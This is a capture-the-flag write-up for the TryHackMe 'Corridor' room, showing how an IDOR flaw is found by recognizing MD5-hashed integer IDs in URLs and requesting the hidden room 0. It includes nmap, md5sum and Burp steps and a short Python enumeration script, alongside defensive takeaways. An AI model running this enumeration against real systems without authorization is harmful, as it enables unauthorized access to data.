Overview
Room: Corridor | Difficulty: Easy | Platform: TryHackMe Goal: Find the flag by exploiting an IDOR (Insecure Direct Object Reference) vulnerability via hash manipulation
Reconnaissance
Nmap Scan
nmap -sV -sC <target-ip>Open ports:
- 22 — SSH (OpenSSH)
- 80 — HTTP (Flask/Python web app)
Web Enumeration
Step 1 — Visit the Website
Navigate to http://<target-ip>
You'll see a corridor with multiple doors — each door is clickable and leads to a different "room" (URL).
Step 2 — Click the Doors
Click on any door. Notice the URL changes to something like:
http://<target-ip>/c4ca4238a0b923820dcc509a6f75849b💡 That long string looks like an MD5 hash!
Step 3 — Identify the Hashes
Click each door and note the hashes in the URL:
Door URL Hash 1 c4ca4238a0b923820dcc509a6f75849b 2 c81e728d9d4c2f636f067f89cc14862c 3 eccbc87e4b5ce2fe28308fd9f2a7baf3 4 a87ff679a2f3e71d9181a67b7542122c ... ...
Crack them on CrackStation or use the command line:
echo -n "1" | md5sum
# c4ca4238a0b923820dcc509a6f75849b
echo -n "2" | md5sum
# c81e728d9d4c2f636f067f89cc14862c💡 The hashes are simply MD5 values of integers 1, 2, 3… corresponding to each door!
Exploitation — IDOR via Hash Manipulation
Step 4 — Understanding the Vulnerability
The app uses MD5 hashes in the URL to reference rooms. If there's no proper access control, we can access any room by providing its MD5 hash — including hidden ones like room 0.
Step 5 — Generate MD5 of 0
echo -n "0" | md5sumOutput:
cfcd208495d565ef66e7dff9f98764da
Step 6 — Navigate to Room 0
Visit:
http://<target-ip>/cfcd208495d565ef66e7dff9f98764da🚩 Flag found!
Using Burp Suite (Alternative Method)
Step 7 — Intercept with Burp
- Open Burp Suite and set your browser proxy to
127.0.0.1:8080 - Click a door on the corridor page
- Intercept the request in Burp
Step 8 — Send to Repeater
- Right-click the request → Send to Repeater
- Modify the hash in the URL to the MD5 of
0:
GET /cfcd208495d565ef66e7dff9f98764da HTTP/1.1- Click Send
🚩 Flag appears in the response!
What is IDOR?
Insecure Direct Object Reference (IDOR) occurs when an application uses user-controllable input to access objects directly without proper authorization checks.
In this case:
Normal flow: User clicks door → MD5 hash in URL → Server returns room
Exploit flow: Attacker crafts MD5 hash of "0" → Server returns hidden room with flagThe server trusts the hash without verifying if the user should access that resource.
Summary of Attack Chain
Visit Website → Corridor with Doors
↓
Click Doors → Notice MD5 Hashes in URL
↓
Identify Pattern → Hashes = MD5 of integers
↓
Generate MD5 of "0" → cfcd208495d565ef66e7dff9f98764da
↓
Navigate to /cfcd208495d565ef66e7dff9f98764da
↓
Flag Retrieved!Flags
Flag Location Root flag http://<target-ip>/cfcd208495d565ef66e7dff9f98764da
Key Takeaways
- IDOR vulnerabilities are in the OWASP Top 10 — extremely common in real-world apps
- Never trust client-supplied identifiers — always validate server-side authorization
- Hashing ≠ Security — MD5 hashes of predictable values (like integers) are trivially reversible
- Enumeration mindset — always inspect URLs, cookies, and parameters for patterns
- Tools like Burp Suite make it easy to manipulate requests and test for IDOR
Extra — Automate with Python
Want to brute force all rooms automatically?
import hashlib
import requests
target = "http://<target-ip>/"
for i in range(0, 20):
hash_val = hashlib.md5(str(i).encode()).hexdigest()
url = target + hash_val
r = requests.get(url)
if "flag" in r.text.lower() or r.status_code == 200:
print(f"[+] Room {i} → {url}")
print(r.text[:500])🐍 This script checks rooms 0–19 and prints any that return interesting content!
💡 Pro Tip: Always test boundary values like 0, -1, or very large numbers when you spot numeric-based object references — hidden resources are often lurking at unexpected IDs!